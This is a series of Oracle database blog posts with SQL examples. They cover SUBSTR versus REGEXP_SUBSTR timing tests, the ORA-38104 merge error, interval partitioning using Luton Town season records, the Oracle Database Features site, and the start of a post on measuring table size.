1100000 rows selected. Elapsed: 00:00:41.76 Execution Plan ---------------------------------------------------------- Plan hash value: 3574103611 ---------------------------------------------------------------------------- | Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time | ---------------------------------------------------------------------------- | 0 | SELECT STATEMENT | | 1100K| 47M| 2089 (1)| 00:00:01 | | 1 | TABLE ACCESS FULL| GALAXY | 1100K| 47M| 2089 (1)| 00:00:01 | ---------------------------------------------------------------------------- Statistics ---------------------------------------------------------- 0 recursive calls 0 db block gets 80459 consistent gets 7616 physical reads 0 redo size 35857676 bytes sent via SQL*Net to client 810042 bytes received via SQL*Net from client 73335 SQL*Net roundtrips to/from client 0 sorts (memory) 0 sorts (disk) 1100000 rows processed
REGEXP_SUBSTR however, takes slow to a new level…
select id,
regexp_substr(episode, '[^|]+') as "A New Hope",
regexp_substr(episode, '[^|]+',1, 2) as "The Empire Strikes Back",
regexp_substr(episode, '[^|]+',1, 3) as "Return of the Jedi",
regexp_substr(episode, '[^|]+',1, 4) as "The Phantom Menace",
regexp_substr(episode, '[^|]+',1, 5) as "Attack of the Clones",
regexp_substr(episode, '[^|]+',1, 6) as "Revenge of the Sith",
regexp_substr(episode, '[^|]+',1, 7) as "The Force Awakens",
regexp_substr(episode, '[^|]+',1, 8) as "Rogue One",
regexp_substr(episode, '[^|]+',1, 9) as "Solo",
regexp_substr(episode, '[^|]+',1, 10) as "The Last Jedi",
regexp_substr(episode, '[^|]+',1, 11) as "The Rise of Skywalker"
from galaxy
/
1100000 rows selected. Elapsed: 00:01:27.25 Execution Plan ---------------------------------------------------------- Plan hash value: 3574103611 ---------------------------------------------------------------------------- | Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time | ---------------------------------------------------------------------------- | 0 | SELECT STATEMENT | | 1100K| 47M| 2089 (1)| 00:00:01 | | 1 | TABLE ACCESS FULL| GALAXY | 1100K| 47M| 2089 (1)| 00:00:01 | ---------------------------------------------------------------------------- Statistics ---------------------------------------------------------- 0 recursive calls 0 db block gets 80459 consistent gets 7616 physical reads 0 redo size 35857680 bytes sent via SQL*Net to client 809519 bytes received via SQL*Net from client 73335 SQL*Net roundtrips to/from client 0 sorts (memory) 0 sorts (disk) 1100000 rows processed
Now see what happens when we give REGEXP_SUBSTR a little help from the humble INSTR (the “hybrid” query) :
select id,
regexp_substr(episode, '[^|]+') as "A New Hope",
decode( instr(episode, '|'), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,1) + 1)) as "The Empire Strikes Back",
decode( instr(episode, '|',1, 2), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,2) + 1)) as "Return of the Jedi",
decode( instr(episode, '|',1, 3), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,3) + 1)) as "The Phantom Menace",
decode( instr(episode, '|',1, 4), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,4) + 1)) as "Attack of the Clones",
decode( instr(episode, '|',1, 5), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,5) + 1)) as "Revenge of the Sith",
decode( instr(episode, '|',1, 6), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,6) + 1)) as "The Force Awakens",
decode( instr(episode, '|',1, 7), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,7) + 1)) as "Rogue One",
decode( instr(episode, '|',1, 8), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,8) + 1)) as "Solo",
decode( instr(episode, '|',1, 9), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,9) + 1)) as "The Last Jedi",
decode( instr(episode, '|',1, 10), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,10) + 1)) as "The Rise of Skywalker"
from galaxy
/
Yes, I have cheated a bit on the aesthetics here by using the more compact DECODE instead of CASE.
However, this does not affect the runtime of the query, which is a bit faster than the pure REGEXP_SUBSTR equivalent :
1100000 rows selected. Elapsed: 00:00:30.83 Execution Plan ---------------------------------------------------------- Plan hash value: 3574103611 ---------------------------------------------------------------------------- | Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time | ---------------------------------------------------------------------------- | 0 | SELECT STATEMENT | | 1100K| 47M| 2089 (1)| 00:00:01 | | 1 | TABLE ACCESS FULL| GALAXY | 1100K| 47M| 2089 (1)| 00:00:01 | ---------------------------------------------------------------------------- Statistics ---------------------------------------------------------- 0 recursive calls 0 db block gets 80459 consistent gets 7616 physical reads 0 redo size 35857680 bytes sent via SQL*Net to client 810158 bytes received via SQL*Net from client 73335 SQL*Net roundtrips to/from client 0 sorts (memory) 0 sorts (disk) 1100000 rows processedTest 1 Results Summary Query MethodTime (secs)SUBSTR ( Standard)20.32REGEXP_SUBSTR with INSTR (Hybrid)30.83SUBSTR with in-line function41.76REGEXP_SUBSTR ( Regexp)87.25
The performance of the Hybrid approach does raise the question of how the REGEXP_SUBSTR compares when we’re just looking to extract a single field from a string, rather than all of them…
Test 2 – Extract the first field onlyIn this instance we’re just looking for the first field in EPISODES.
In this context, the hybrid approach doesn’t apply because we’re always starting our search at the start of the input string.
Starting, once again with the Standard approach :
select id,
substr
(
episode, 1,
case
when instr(episode, '|', 1,1) > 0 then instr(episode, '|', 1,1) -1
else length(episode)
end
) as "A New Hope"
from galaxy
/
1100000 rows selected. Elapsed: 00:00:05.33 Execution Plan ---------------------------------------------------------- Plan hash value: 3574103611 ---------------------------------------------------------------------------- | Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time | ---------------------------------------------------------------------------- | 0 | SELECT STATEMENT | | 1100K| 47M| 2089 (1)| 00:00:01 | | 1 | TABLE ACCESS FULL| GALAXY | 1100K| 47M| 2089 (1)| 00:00:01 | ---------------------------------------------------------------------------- Statistics ---------------------------------------------------------- 0 recursive calls 0 db block gets 80459 consistent gets 7616 physical reads 0 redo size 25086067 bytes sent via SQL*Net to client 808790 bytes received via SQL*Net from client 73335 SQL*Net roundtrips to/from client 0 sorts (memory) 0 sorts (disk) 1100000 rows processed
Now for REGEXP_SUBSTR :
select id,
regexp_substr( episode, '[^|]+') as "A New Hope"
from galaxy
/
1100000 rows selected. Elapsed: 00:00:06.38 Execution Plan ---------------------------------------------------------- Plan hash value: 3574103611 ---------------------------------------------------------------------------- | Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time | ---------------------------------------------------------------------------- | 0 | SELECT STATEMENT | | 1100K| 47M| 2089 (1)| 00:00:01 | | 1 | TABLE ACCESS FULL| GALAXY | 1100K| 47M| 2089 (1)| 00:00:01 | ---------------------------------------------------------------------------- Statistics ---------------------------------------------------------- 0 recursive calls 0 db block gets 80459 consistent gets 7616 physical reads 0 redo size 25086067 bytes sent via SQL*Net to client 808868 bytes received via SQL*Net from client 73335 SQL*Net roundtrips to/from client 0 sorts (memory) 0 sorts (disk) 1100000 rows processed
Interestingly, whilst it’s still not as fast, the Regexp runtime is only 20% longer than the Standard.
This contrasts markedly with the 430% longer that the Regexp took for our first test.
Test 2 Results Summary Query MethodTime (secs)Standard5.33Regexp6.38Does this relative performance hold true for any single field in the input string ?
Test 3 – Extract the last field onlyStarting with the Standard query :
select
id,
case when instr(episode, '|', 1, 10) > 0 then
substr( episode, instr(episode, '|', 1, 10) + 1,
case when instr(episode, '|', 1, 11) > 0 then instr(episode, '|',1, 11) - 1 else length(episode) end
-
instr(episode, '|', 1, 10))
end as "The Rise of Skywalker"
from galaxy
/
1100000 rows selected. Elapsed: 00:00:05.44 Execution Plan ---------------------------------------------------------- Plan hash value: 3574103611 ---------------------------------------------------------------------------- | Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time | ---------------------------------------------------------------------------- | 0 | SELECT STATEMENT | | 1100K| 47M| 2089 (1)| 00:00:01 | | 1 | TABLE ACCESS FULL| GALAXY | 1100K| 47M| 2089 (1)| 00:00:01 | ---------------------------------------------------------------------------- Statistics ---------------------------------------------------------- 0 recursive calls 0 db block gets 80459 consistent gets 7616 physical reads 0 redo size 25686033 bytes sent via SQL*Net to client 808915 bytes received via SQL*Net from client 73335 SQL*Net roundtrips to/from client 0 sorts (memory) 0 sorts (disk) 1100000 rows processed
Once again, the Regexp Query is much slower…
select
id,
regexp_substr(episode, '[^|]+',1, 11) as "The Rise of Skywalker"
from galaxy
/
1100000 rows selected. Elapsed: 00:00:16.16 Execution Plan ---------------------------------------------------------- Plan hash value: 3574103611 ---------------------------------------------------------------------------- | Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time | ---------------------------------------------------------------------------- | 0 | SELECT STATEMENT | | 1100K| 47M| 2089 (1)| 00:00:01 | | 1 | TABLE ACCESS FULL| GALAXY | 1100K| 47M| 2089 (1)| 00:00:01 | ---------------------------------------------------------------------------- Statistics ---------------------------------------------------------- 0 recursive calls 0 db block gets 80459 consistent gets 7616 physical reads 0 redo size 25686033 bytes sent via SQL*Net to client 808888 bytes received via SQL*Net from client 73335 SQL*Net roundtrips to/from client 0 sorts (memory) 0 sorts (disk) 1100000 rows processed
…unless we use the hybrid approach…
select
id,
decode( instr(episode, '|',1, 10), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,10) + 1)) as "The Rise of Skywalker"
from galaxy
/
1100000 rows selected. Elapsed: 00:00:05.60 Execution Plan ---------------------------------------------------------- Plan hash value: 3574103611 ---------------------------------------------------------------------------- | Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time | ---------------------------------------------------------------------------- | 0 | SELECT STATEMENT | | 1100K| 47M| 2089 (1)| 00:00:01 | | 1 | TABLE ACCESS FULL| GALAXY | 1100K| 47M| 2089 (1)| 00:00:01 | ---------------------------------------------------------------------------- Statistics ---------------------------------------------------------- 0 recursive calls 0 db block gets 80459 consistent gets 7616 physical reads 0 redo size 25686033 bytes sent via SQL*Net to client 808736 bytes received via SQL*Net from client 73335 SQL*Net roundtrips to/from client 0 sorts (memory) 0 sorts (disk) 1100000 rows processedTest 3 Results Summary Query MethodTime (secs)Standard 5.44Hybrid 5.60Regexp16.16 Conclusions
These tests seem to bear out the fact that, in general, SUBSTR offers better performance than REGEXP_SUBSTR.
However, the performance of REGEXP_SUBSTR can be greatly improved if used in conjunction with INSTR.
As always, the decision as to which function to use will depend on the specific circumstances you find yourself in.
Things that make you go VAAARRRGGGHHHH ! – ORA-38104 in a Stored Program Unit
I do have some empathy with Lauren James getting quite cross at work.
OK, it’s not as pressurised as striving to reach a World Cup Quarter Final, but I am known to become somewhat annoyed when Oracle presents me with :
ORA-38104: Columns referenced in the ON Clause cannot be updated
The error itself is reasonable enough. The thing is though, that the offending merge statement will not trigger a compile-time error if it’s in a Stored Program Unit. Oh no.
Instead, Oracle will let you carry on in blissful ignorance and only give you the bad news at runtime…
Let’s say we have a table called TEAM_AVAILABILITY :
create table team_availability
(
squad_number number,
first_name varchar2(250),
last_name varchar2(250),
available_flag varchar2(1)
)
/
insert into team_availability( squad_number, first_name, last_name)
values( 1, 'Mary', 'Earps');
insert into team_availability( squad_number, first_name, last_name)
values( 2, 'Lucy', 'Bronze');
insert into team_availability( squad_number, first_name, last_name)
values( 3, 'Niamh', 'Charles');
insert into team_availability( squad_number, first_name, last_name)
values( 4, 'Keira', 'Walsh');
insert into team_availability( squad_number, first_name, last_name)
values( 5, 'Alex', 'Greenwood');
insert into team_availability( squad_number, first_name, last_name)
values( 6, 'Millie', 'Bright');
insert into team_availability( squad_number, first_name, last_name)
values( 7, 'Lauren', 'James');
insert into team_availability( squad_number, first_name, last_name)
values( 8, 'Georgia', 'Stanway');
insert into team_availability( squad_number, first_name, last_name)
values( 9, 'Rachel', 'Daly');
insert into team_availability( squad_number, first_name, last_name)
values( 10, 'Ella', 'Toone');
insert into team_availability( squad_number, first_name, last_name)
values( 11, 'Lauren', 'Hemp');
insert into team_availability( squad_number, first_name, last_name)
values( 12, 'Jordan', 'Nobbs');
insert into team_availability( squad_number, first_name, last_name)
values( 13, 'Hannah', 'Hampton');
insert into team_availability( squad_number, first_name, last_name)
values( 14, 'Lotte', 'Wubben-Moy');
insert into team_availability( squad_number, first_name, last_name)
values( 15, 'Esme', 'Morgan');
insert into team_availability( squad_number, first_name, last_name)
values( 16, 'Jess', 'Carter');
insert into team_availability( squad_number, first_name, last_name)
values( 17, 'Laura', 'Coombs');
insert into team_availability( squad_number, first_name, last_name)
values( 18, 'Chloe', 'Kelly');
insert into team_availability( squad_number, first_name, last_name)
values( 19, 'Bethany', 'England');
insert into team_availability( squad_number, first_name, last_name)
values( 20, 'Katie', 'Zelem');
insert into team_availability( squad_number, first_name, last_name)
values( 21, 'Ellie', 'Roebuck');
insert into team_availability( squad_number, first_name, last_name)
values( 22, 'Katie', 'Robinson');
insert into team_availability( squad_number, first_name, last_name)
values( 23, 'Alessia', 'Russo');
commit;
We have a procedure that we can use to mark a player as being unavailable for selection :
create or replace procedure mark_player_unavailable( i_squad_number team_availability.squad_number%type)
is
begin
merge into team_availability
using dual
on
(
squad_number = i_squad_number
and available_flag is null
)
when matched then update
set available_flag = 'N';
end mark_player_unavailable;
/
When we create the procedure, everything seems fine…
Procedure MARK_PLAYER_UNAVAILABLE compiled
However, running it causes Oracle to do the equivalent of a VAR check, which results in :
As to why Oracle does this, other than to annoy me, I have no idea.
Then again, I’m not sure why I keep falling into this trap either.
To avoid this altogether, there are a couple of options…
WorkaroundsWe could simply use an update instead of a merge
create or replace procedure mark_player_unavailable( i_squad_number team_availability.squad_number%type)
is
begin
update team_availability
set available_flag = 'N'
where squad_number = i_squad_number
and available_flag is null;
end mark_player_unavailable;
/
However, if we still want to use a merge, then we need to use an inline view in the USING clause :
create or replace procedure mark_player_unavailable( i_squad_number team_availability.squad_number%type)
is
begin
merge into team_availability ta
using
(
select tau.squad_number
from team_availability tau
where tau.squad_number = i_squad_number
and tau.available_flag is null
) ilv
on
(
ta.squad_number = ilv.squad_number
)
when matched then update
set ta.available_flag = 'N';
end mark_player_unavailable;
/
…which has the same result.
With my equanimity restored I can now reflect that yes, Womens football is different from the Mens. In the Womens game, England DO win penalty shoot-outs !
Happy Hatters and Oracle Interval Partitioning
I wouldn’t say that Simon is obsessed about Luton Town FC, but he has been known to express his affection through the medium of creosote :
Needless to say, he’s quite looking forward to next season as the Hatters have completed their Lazarus-like resurrection from the depths of the Conference to the pinnacle of English football – the Premier League.
Over the years, I’ve occasionally accompanied Simon to Kennelworth Road to watch Luton battle their way through the divisions, so it’s only fitting that I should pay tribute to their achievement in the examples that follow.
The technical subject at hand here is the advantages available when using Interval Partitioning syntax to Range Partition a table by a date.
As we’re talking about partitioning, he’s the standard warning about licensing…
Partitioning is usually an additional cost option on the Enterprise Edition license. It’s a really good idea to make sure that whatever platform you’re on is appropriately licensed before you use this feature.
For this post, I’ll be using 23c Free, which does include Partitioning.
We’ll start by creating a conventional Range Partitioned table and see what happens when we try to create data in a non-existent partition.
We’ll then try the same thing, but this time using an Interval Partitioned Table.
Finally, we’ll take a look at the SQL functions available to define intervals when creating Interval Partitions.
Partitioning by Date using conventional Range PartitioningFor the purposes of this example, I’m going to create a table which holds details of Luton’s final record for a League Season. I’m going to arbitrarily “end” each season on 30th June each year.
I’m going to separate each year into it’s own partition.
Whilst this may not be a realistic use of partitioning – you’re unlikely to create a table to hold a single row per partition – it does simplify the examples that follow :
create table luton_seasons
(
season_end_date date,
competition varchar2(25),
games_played number,
games_won number,
games_drawn number,
games_lost number,
goals_for number,
goals_against number,
points number,
finishing_position number,
notes varchar2(4000)
)
partition by range( season_end_date)
(
partition season_2013_14 values less than (to_date ('01-JUL-2014', 'DD-MON-YYYY')),
partition season_2014_15 values less than (to_date ('01-JUL-2015', 'DD-MON-YYYY')),
partition season_2015_16 values less than (to_date ('01-JUL-2016', 'DD-MON-YYYY')),
partition season_2016_17 values less than (to_date ('01-JUL-2017', 'DD-MON-YYYY')),
partition season_2017_18 values less than (to_date ('01-JUL-2018', 'DD-MON-YYYY'))
)
/
Populating the table works as you’d expect…
-- 2013-14
insert into luton_seasons
(
season_end_date,
competition,
games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points,
finishing_position, notes
)
values
(
to_date('01-JUN-2014', 'DD-MON-YYYY'),
'Conference',
46, 30, 11, 5, 102, 35, 101,
1, 'Promoted back to the Football League !'
);
-- 2014-15
insert into luton_seasons
(
season_end_date,
competition,
games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points,
finishing_position, notes
)
values
(
to_date('01-JUN-2015', 'DD-MON-YYYY'),
'League 2',
46, 19, 11, 16, 54, 44, 68,
8, null
);
-- 2015-16
insert into luton_seasons
(
season_end_date,
competition,
games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points,
finishing_position, notes
)
values
(
to_date('01-JUN-2016', 'DD-MON-YYYY'),
'League 2',
46, 19, 9, 18, 63, 61, 66,
11, null
);
-- 2016-17
insert into luton_seasons
(
season_end_date,
competition,
games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points,
finishing_position, notes
)
values
(
to_date('01-JUN-2017', 'DD-MON-YYYY'),
'League 2',
46, 20, 17, 9, 70, 43, 77,
4, 'Lost in Promotion Play-Off Semi-Final'
);
-- 2017-18
insert into luton_seasons
(
season_end_date,
competition,
games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points,
finishing_position, notes
)
values
(
to_date('01-JUN-2018', 'DD-MON-YYYY'),
'League 2',
46, 25, 13, 8, 94, 46, 88,
2, 'Promoted'
);
commit;
select season_end_date, competition, finishing_position, notes
from luton_seasons
order by season_end_date
/
SEASON_END_DATE COMPETITION FINISHING_POSITION NOTES
--------------- ----------- -------------------- ----------------------------------------
01-JUN-2014 Conference 1 Promoted back to the Football League !
01-JUN-2015 League 2 8
01-JUN-2016 League 2 11
01-JUN-2017 League 2 4 Lost in Promotion Play-Off Semi-Final
01-JUN-2018 League 2 2 Promoted
5 rows selected.
…until we try to insert a record for which a partition does not exist…
-- 2018-19
insert into luton_seasons
(
season_end_date,
competition,
games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points,
finishing_position, notes
)
values
(
to_date('01-JUN-2019', 'DD-MON-YYYY'),
'League 1',
46, 27, 13, 6, 90, 42, 94,
1, 'Champions ! Promoted to The Championship'
);
…when we are met with :
ORA-14400: no partition found in table MIKE.LUTON_SEASONS for inserted partition key "2019-06-01T00:00:00"
Wouldn’t it be good if we could just get Oracle to create partitions automatically, as and when they were needed ? Well, we can…
Creating an Interval Partitioned Table.We’re going to re-create the table, but this time, we’re going to use Interval Partitioning :
drop table luton_seasons;
create table luton_seasons
(
season_end_date date,
competition varchar2(25),
games_played number,
games_won number,
games_drawn number,
games_lost number,
goals_for number,
goals_against number,
points number,
finishing_position number,
notes varchar2(4000)
)
partition by range( season_end_date)
interval (numtoyminterval(1, 'year'))
(
partition season_2013_14 values less than (to_date('01-JUL-2014', 'DD-MON-YYYY'))
)
/
We’re still partitioning by range. However, we’re now specifying an interval, in this case 1 year.
For now though, our chances of avoiding ORA-14400 don’t look good as we’ve only created one partition :
select partition_name, high_value
from user_tab_partitions
where table_name = 'LUTON_SEASONS'
order by 1;
PARTITION_NAME HIGH_VALUE
-------------------- ------------------------------------------------------------------------------------------
SEASON_2013_14 TO_DATE(' 2014-07-01 00:00:00', 'SYYYY-MM-DD HH24:MI:SS', 'NLS_CALENDAR=GREGORIAN')
Side Note – In 23c Oracle have added HIGH_VALUE_CLOB and HIGH_VALUE_JSON to USER_TAB_PARTITIONS so you can access the partition HIGH_VALUE via a datatype that is more malleable than the LONG HIGH_VALUE column that’s been in this view since David Pleat was last Luton manager.
Anyhow, let’s give it a go :
insert into luton_seasons ( season_end_date, competition, games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points, finishing_position, notes ) values ( to_date('01-JUN-2014', 'DD-MON-YYYY'), 'Conference', 46, 30, 11, 5, 102, 35, 101, 1, 'Promoted back to the Football League !' ); -- 2014-15 insert into luton_seasons ( season_end_date, competition, games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points, finishing_position, notes ) values ( to_date('01-JUN-2015', 'DD-MON-YYYY'), 'League 2', 46, 19, 11, 16, 54, 44, 68, 8, null ); -- 2015-16 insert into luton_seasons ( season_end_date, competition, games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points, finishing_position, notes ) values ( to_date('01-JUN-2016', 'DD-MON-YYYY'), 'League 2', 46, 19, 9, 18, 63, 61, 66, 11, null ); -- 2016-17 insert into luton_seasons ( season_end_date, competition, games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points, finishing_position, notes ) values ( to_date('01-JUN-2017', 'DD-MON-YYYY'), 'League 2', 46, 20, 17, 9, 70, 43, 77, 4, 'Lost in Promotion Play-Off Semi-Final' ); -- 2017-18 insert into luton_seasons ( season_end_date, competition, games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points, finishing_position, notes ) values ( to_date('01-JUN-2018', 'DD-MON-YYYY'), 'League 2', 46, 25, 13, 8, 94, 46, 88, 2, 'Promoted' ); -- 2018-19 insert into luton_seasons ( season_end_date, competition, games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points, finishing_position, notes ) values ( to_date('01-JUN-2019', 'DD-MON-YYYY'), 'League 1', 46, 27, 13, 6, 90, 42, 94, 1, 'Champions ! Promoted to The Championship' ); -- 2019-20 insert into luton_seasons ( season_end_date, competition, games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points, finishing_position, notes ) values ( to_date('01-JUN-2020', 'DD-MON-YYYY'), 'Championship', 46, 14, 9, 23, 54, 82, 15, 19, null ); -- 2020-21 insert into luton_seasons ( season_end_date, competition, games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points, finishing_position, notes ) values ( to_date('01-JUN-2021', 'DD-MON-YYYY'), 'Championship', 46, 17, 11, 18, 41, 52, 62, 12, null ); -- 2021-22 insert into luton_seasons ( season_end_date, competition, games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points, finishing_position, notes ) values ( to_date('01-JUN-2022', 'DD-MON-YYYY'), 'Championship', 46, 21, 12, 13, 63, 55, 75, 6, 'Lost in Promotion Play-Off Semi-Final' ); -- 2022-23 insert into luton_seasons ( season_end_date, competition, games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points, finishing_position, notes ) values ( to_date('01-JUN-2023', 'DD-MON-YYYY'), 'Championship', 46, 21, 17, 8, 57, 39, 80, 3, 'Won Play-Off Final and promoted to Premiership !' ); commit;
Oh look, that all worked :
…and the new partitions have been created automatically…
exec dbms_stats.gather_table_stats(user, 'LUTON_SEASONS');
select partition_name, high_value, num_rows
from user_tab_partitions t
where table_name = 'LUTON_SEASONS'
order by partition_position
/
We can further confirm that a particular partition holds just one record. For example :
select season_end_date, competition, finishing_position
from luton_seasons partition (SYS_P996);
…or, as we’re partitioning by date…
select season_end_date, competition, finishing_position
from luton_seasons partition for (to_date ('31-MAY-2019', 'DD-MON-YYYY'));
…confirms a single row in the partition…
SEASON_END_DATE COMPETITION FINISHING_POSITION ------------------------------ ---------------- ------------------ 01-JUN-2019 League 1 1 1 row selected.Interval Partitioining Clairvoyance
Now, you’re probably thinking that Interval partitioning will ensure that your table is equi-partitioned in terms of time periods, provided the value of the partition key is inserted sequentially.
But what happens if you enter dates out-of-sequence ?
For example :
insert into luton_seasons
(
season_end_date,
competition,
games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points,
finishing_position, notes
)
values
(
to_date('01-JUN-2025', 'DD-MON-YYYY'),
'Premier League',
38, 38, 0, 0, 112, 7, 114,
1, 'Clean sweep of trophies and a perfect season in one go !'
);
insert into luton_seasons
(
season_end_date,
competition,
games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points,
finishing_position, notes
)
values
(
to_date('01-JUN-2024', 'DD-MON-YYYY'),
'Premier League',
38, 20, 10, 8, 64, 40, 70,
4, 'Champions League here we come !'
);
commit;
Now, you might think that Oracle would create the partition for values less than 01-JUL-2025 on the creation of the first record and then assign the second record to that partition as it already exists.
However, it’s actually smart enough to create the “missing” partition for the second insert :
select season_end_date, competition, finishing_position
from luton_seasons partition for (to_date ('01-JUN-2024', 'DD-MON-YYYY'))
order by 1;
SEASON_END_DATE COMPETITION FINISHING_POSITION
------------------------------ ------------------- ------------------
01-JUN-2024 Premier League 4
1 row selected.
We can see that the table’s last partition by position has a lower system-generated number in it’s name than it’s predecessor, indicating that it was created first :
select partition_name, partition_position, high_value
from user_tab_partitions
where table_name = 'LUTON_SEASONS'
order by partition_position;
The Interval Functions
There are two functions that you can use when specifying an interval for your partitions :
Despite the camel-case formatting of these function names they are in-fact case insensitive when being used in SQL or PL/SQL.
NumToYMInterval lets you specify an interval in either ‘YEARS’ or ‘MONTHS’ :
select to_date('29-FEB-2020', 'DD-MON-YYYY') + numtoyminterval(4, 'year') as next_leap_year_day
from dual;
NEXT_LEAP_YEAR_DAY
------------------------------
29-FEB-2024
select to_date('01-JUL-2023', 'DD-MON-YYYY') + numtoyminterval(3, 'month') as start_q4_2023
from dual;
START_Q4_2023
------------------------------
01-OCT-2023
NumToDSInterval
NumToDSInterval allows you to specify more granular intervals – i.e :
- DAY
- HOUR
- MINUTE
- SECOND
How long is a football match ?
select numToDSInterval(5400, 'second') as match_length
from dual;
select numtodsinterval(90, 'minute') as match_length
from dual;
select numToDSInterval(1.5, 'hour') as match_length
from dual;
select numtodsinterval(1.5/24, 'day') as match_length
from dual;
Each of these queries return :
MATCH_LENGTH
------------------------------
+00 01:30:00.000000
Note that I’ve included the FROM clause in the above queries because, until the full 23c release sees the light of day, we’ll still need to use it in the day job.
Whatever you’re planning to do to pass the time until …
alter session set nls_date_format='DD-MON-YYYY HH24:MI';
select
to_date('12-AUG_2023', 'DD-MON-YYYY') + numtodsinterval(15, 'hour') as kick_off
from dual;
…using interval partitioning means that it should involve less manual partition creation.
The Oracle Database Features Site – reducing Oracle Documentation Drudgery
If there’s one thing Teddy approves of it’s eating you’re own Dog Food…although, he does appreciate the value of a varied diet…
Some nameless heroes in the Oracle Documentation Team seem to agree and have produced a publicly available APEX application which allows you to search:
- the features available in each successive Oracle release
- the various licensing options and packs available with each Edition
Time to head on over to the Oracle Database Features site and take a closer look…
FeaturesI’ve heard a fair bit about schema only accounts. I wonder when they came along ?
It looks like they have been around since 18c with further enhancements in later releases.
If I want details on a particular listing, I can just click on the title :
As you can see, there’s also a link to the relevant documentation.
It’s also possible to do a less specific search. For example, if I’m looking to upgrade from 11.2 to 19c and I want to see all of the new features in all of the intermediate releases :
The application also allows you to focus on areas of interest.
For example, If I want to see what’s new in 21c as far as Analytic Functions are concerned,
I can choose Data Warehousing/Big Data as my focus area then further refine my search by specifying Analytic Functions as the Sub Area of Interest.
Together with checking 21c as the Version and that I’m interested in New features only, the Application returns this :
It’s worth noting that the information in this application is based on the New Features documentation for the respective Oracle versions. Therefore, whilst you’ll find an entry for the VALIDATE_CONVERSION SQL function, introduced in 12.1…
LicensingSelecting the Licensing tab reveals functionality for navigating the often complex area of Oracle Licensing.
For example, if we want to find out which Editions Partitioning is available on :
Once again, further details are available by clicking on the title of a result row :
The Oracle Database Features site is a welcome augmentation to the existing documentation.
It’s categorised and searchable content offer the potential for significant saving in time and effort, especially when you’re preparing to move between Oracle versions.
The Ultimate Question of Life, the Universe, and… how big is my Oracle Table ?
At a time when the debate rages about how much you should trust what AI tells you, it’s probably worth recalling Deep Thought’s wildly incorrect assertion that the answer to the Ultimate Question of Life, the Universe, and Everything is forty-two.
As any Database specialist will know, the answer is the same as it is to the question “How big is my Oracle Table ?” which is, of course, “It depends”.
What it depends on is whether you want to know the volume of data held in the table, or the amount of space the database is using to store the table and any associated segments (e.g. indexes).
Connecting to my trusty Free Tier OCI Oracle Instance ( running 19c Enterprise Edition), I’ve set out on my journey through (disk) space to see if I can find some more definitive answers…
How big is my table in terms of the raw data stored in it ?Before going any further, I should be clear on the database language settings and character set that’s being used in the examples that follow. Note particularly that I’m not using a multi-byte character set :
select parameter, value from gv$nls_parameters order by parameter / PARAMETER VALUE ------------------------------ ------------------------------ NLS_CALENDAR GREGORIAN NLS_CHARACTERSET AL32UTF8 NLS_COMP BINARY NLS_CURRENCY £ NLS_DATE_FORMAT DD-MON-YYYY NLS_DATE_LANGUAGE ENGLISH NLS_DUAL_CURRENCY € NLS_ISO_CURRENCY UNITED KINGDOM NLS_LANGUAGE ENGLISH NLS_LENGTH_SEMANTICS BYTE NLS_NCHAR_CHARACTERSET AL16UTF16 NLS_NCHAR_CONV_EXCP FALSE NLS_NUMERIC_CHARACTERS ., NLS_SORT BINARY NLS_TERRITORY UNITED KINGDOM NLS_TIMESTAMP_FORMAT DD-MON-RR HH24.MI.SSXFF NLS_TIMESTAMP_TZ_FORMAT DD-MON-RR HH24.MI.SSXFF TZR NLS_TIME_FORMAT HH24.MI.SSXFF NLS_TIME_TZ_FORMAT HH24.MI.SSXFF TZR 19 rows selected.
Now, let see if we can work out how much raw data is held in a table.
We’ll start with a very simple example :
create table marvin as
select 1000 + rownum as id
from dual
connect by rownum <= 1024;
Marvin may have a brain the size of a planet but his tabular namesake has more modest space requirements.
It’s 1024 records are all 4 digits long.
Therefore, the size of the table data should be 4096 bytes, right ?
“Hang on”, your thinking, “why not just lookup the size in USER_SEGMENTS and make this a really short post ?”
Well :
select bytes from user_segments where segment_name = 'MARVIN' and segment_type = 'TABLE' / BYTES ---------- 65536
USER_SEGMENTS will give you a size in bytes, but it’s not the same as the amount of raw data.
We’ll come back to this in a bit.
For now though, we can cross-check the size from elsewhere in the data dictionary, provided the stats on the table are up-to-date.
To ensure that this is so, I can run :
exec dbms_stats.gather_table_stats('MIKE', 'MARVIN');
This will ensure that statistics data is populated in the USER_TABLES view. This means that we can estimate the data volume by running the following query :
select num_rows, avg_row_len,
num_rows * avg_row_len as data_in_bytes
from user_tables
where table_name = 'MARVIN'
/
…which returns…
